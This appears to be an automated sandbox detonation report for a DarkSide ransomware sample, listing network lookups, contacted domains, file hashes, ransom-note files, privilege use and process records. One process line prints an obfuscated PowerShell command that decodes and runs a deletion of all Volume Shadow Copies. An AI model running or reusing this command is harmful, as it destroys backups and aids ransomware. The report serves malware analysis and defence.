US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 13.248.169.48:443 catsdegree.com tcp
HK 154.219.131.251:443 temisleyes.com tcp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/2780-0-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-8-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2324-10-0x00007FFC1B7D3000-0x00007FFC1B7D5000-memory.dmp

memory/2324-16-0x0000028144290000-0x00000281442B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgyqzljn.k4d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2324-21-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2324-22-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2780-23-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2324-24-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

memory/2324-27-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d34112a7b4df3c9e30ace966437c5e40
SHA1 ec07125ad2db8415cf2602d1a796dc3dfc8a54d6
SHA256 cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf
SHA512 49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

C:\Users\Admin\README.bf9fb421.TXT

MD5 f418a249405444da33cc73b402a26306
SHA1 1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256 b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512 b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2780-222-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-227-0x00000000002C0000-0x00000000002D7000-memory.dmp

memory/2780-229-0x00000000002C0000-0x00000000002D7000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1559s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (150) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/2384-0-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2316-5-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

memory/2316-6-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/2316-7-0x0000000002080000-0x0000000002088000-memory.dmp

memory/2316-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2316-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

memory/2384-12-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2316-13-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

C:\Users\README.a2dbc85c.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

